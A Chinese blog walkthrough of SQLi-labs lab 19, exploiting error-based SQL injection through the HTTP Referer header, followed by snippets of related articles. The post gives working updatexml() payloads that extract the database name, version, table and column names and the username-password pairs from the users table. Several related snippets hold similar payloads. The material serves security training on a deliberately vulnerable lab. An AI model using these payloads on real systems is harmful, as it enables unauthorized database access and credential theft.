SQLilabs的第19关——http请求头注入(Referer)(报错注入)

最新推荐文章于 2024-08-05 16:03:01 发布
最新推荐文章于 2024-08-05 16:03:01 发布
阅读量427 收藏 2
点赞数
文章标签: 数据库 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73393033/article/details/131864804
版权

1、判断闭合方式

我们先使用burp破解出一个正确的账号和密码,返回正常的页面,如下:

它显示了Referer,我们大胆猜测注入点在这里。

我们在截取的数据包中的Referer上加上一个'。返回页面如下:

出现报错。这说明闭合方式就是'。

在进行一次验证,在referer的后面输入

'#

这时就不会报错了,可以确定闭合方式是单引号

2、确定注入方式

在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。

3、爆破数据库名,用户名,版本

输入语句

1',updatexml(1,concat('~',concat(database(),'~',user(),'~',version())),1)) #

,返回页面如下:

4、爆破数据表名

输入语句

1',updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),1)) #

,返回页面如下:

5、爆破列名

输入语句

1',updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),'~'),1)) #

,返回页面如下:

6、爆破字段内容

输入语句

1',updatexml(1,concat('~',(select group_concat(username,'-',password) from users),'~'),1)) #

,返回页面如下:

我们发现数据没有显示完全,我们还使用mid函数,比如输入语句

1',updatexml(1,concat('~',mid((select group_concat(username,'-',password) from users),12,12),'~'),1)) #

,该语句表示显示第12个字符后面的12个字符(包括第12个字符)。返回页面如下:

到此打靶结束

Hacker-小胖锅
关注
sqli-labs靶场实现(六)【HTTP中的SQL注入】(less-18~19(User-Agent、Referer)、具体步骤+图文详解)
weixin_46709219的博客
12-26 777
一)HTTP中的SQL注入   1)HTTP中的注入介绍   2)HTTP User-Agent注入   3)HTTP Referer注入   4)sqlmap安全测试 ———————————————————————————————————————————————————————— 一)HTTP中的SQL注入 1)HTTP中的注入介绍 上面代码中使用的方法解析: 1)check_input()——判断是否有输入一个变量$value 2)empty()——判断变量$value的值是否为空 3)
sqli-labs Less-5 (报错注入
A9874564的博客
02-25 4264
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
sql注入靶场sqli-labs常见sql注入漏洞详解
网安小菜鸡的博客
08-05 725
把表里面每一行的结果拼成一个字符串输出(
Sqlilabs-19
KAKA的博客
07-09 362
19 跟第 18 类似,User-Agent 改成了 Referer 改造注入Referer “浏览器向 WEB 服务器表明自己是从哪个网页 /URL 获得/点击 当前请求中的网址/URL” 同样的,这一对 usernanme 和 password 都进行了 check_input hackbar 制作针对 referer 的 payload: –查表 1' and extractvalue(1,concat(0x7e,(select table_name from information_
sqli-labs(19
jimggg的博客
03-20 280
Less-19 POST - Header Injection - Referer field - Error based (基于部的Referer POST报错注入)
sqli-labs靶场第十九
gou1791241251的博客
12-30 1030
这一注入点不着账号和密码,在http部中的referer字段。可以尝试一下输入单引号和双引号进行测试。 注意哈,前提是需要账号密码正确输入的情况下才能注入成功,因为后台会先校验账号密码是否能够查询出结果才会执行referer字段的插入操作。 由图可知啊,输入单引号时页面显示了报错信息,闭合方式为单引号闭合,此时可以使用报错注入。 ',updatexml(1,concat(0x3a,database(),0x3a),1))# 成功爆库。XPATH语法错误。 ...
sqli-labs第十九详解
金 帛的博客
05-05 2455
sqli-labs第十九详解
sqli-labs(1-30) 个人思路分享——SQL注入
CC__Faker的博客
06-20 1260
下载地址:https://github.com/Audi-1/sqli-labs 目录Page-1(Basic Challenges)less-1less-2less-3less-4less-5less-6less-7Page-2 (Advanced Injections)Page-3 (Stacked Injections)Page-4 (Challenges) Page-1(Basic Challenges) less-1 0x01 利用cc'key--+引起语句报错,发现报错中cc正常执行,于是猜测是
sql注入详解
m0_73109590的博客
08-03 1031
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
SQL注入基础学习(笔记)
部分学习记录
07-29 688
此文为自己学习SQL注入基础的笔记,由于是从某书直接复制过来的,存在格式问题,不过对于阅读应该影响不大,在此留个痕迹,便于以后复习和查阅,也希望能给刚刚开始学习的盆友们一点帮助吧。(不喜勿喷,谢谢) #GET基于报错的SQL注入 #GET基于报错的SQL注入发现 注入类型:数字、字符(单引号、双引号、双单引号、括号)、反斜杠 注入点?id=1 ##less-1 输入:’ 报错: 分析: ‘‘1’’ LIMIT 0,1’ 发现 ‘1’’ LIMIT 0,1 中多了一个单引号,推测输入内容为单引号引起来的字
sqli-labs ————less -19
Fly_鹏程万里
05-12 1085
Less-19提交一个测试数据试试:username:adminpassword:aaa由此可以看到出现了Referer,我们不妨来看看源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> ...
sqli-labs(19)
weixin_30615767的博客
05-27 126
百度了一下 基于错误的referer注入 0X01爱之初体验 猜测是基于referer注入 我们在referer后面加入单引号测试一下 真的报错了诶 那我们猜测一下 他应该是把 referer插入到数据库中去了 语句怎么构造呐? 说实话 这里我不知道 得看看源码才能知道 因为还不熟悉结构 原来是将referer和ip插入到数据库中去 只有两个要插入 那我们尝试一下构造...
sqli-labs19
devilare的博客
01-19 328
sqli-labs19基于referer的SQL注入 来到19题 应该是要在Referer处入手了,抓包单引号闭合一下 出现报错,说明能够进行注入,但是怎么注入呢?看一下源码只插入两个参数,根据18题的基础构造语句查库名’,updatexml(1,concat(0x7e,database(),0x7e),1))# 接下来就是常规操作了 Git it! ...
SQLI-labs-第十九和第二十
weixin_54055099的博客
05-20 486
Sqli-labs第十九和二十,http注入referer、cookie注入
sqli-labs19(基于http部报错盲注)通思路
zyh1588的博客
11-18 905
小白回顾sql靶场第19
sqli-labs-基于报错的注入
zlloveyouforever的博客
04-30 2824
这里使用sqli-labs第六来学习报错注入,当然第五也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
sql-labs报错注入
weixin_47346400的博客
03-12 610
updatexml() 爆数据库 爆表 爆用户
SQLi-Labs 基于报错的SQL注入
shangMD01的博客
02-17 2516
实验环境 操作系统:Windows10 安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar等 靶机:A-SQLi-Labs 安装的应用软件:Apache、MYSQL、PHP;DVWA、SQLi-Labs 实验步骤: 1.访问目标网站 在Windows10上打开火狐浏览器,并访问靶机上的SQLi-labs网站Less-1 http://靶机ip/sql/Less-1 登录后,先给一个GET参数: http://靶机ip/sql/Less-1/?i
sqli-labs】Less 6——报错注入(双引号)
用博客做做记录的小白
07-03 287
sqli-labs第6less 6,双引号注入型,解题方法为报错注入函数。
http注入sqli
最新发布
08-25
HTTP注入SQL注入(Header Injection SQLi)是一种攻击手法,发生在通过HTTP请求字段传递数据,并且这个数据直接被用于构造数据库查询的时候。攻击者会利用特殊的字符序列将恶意SQL代码嵌入到请求的某个部字段...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hacker-小胖锅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值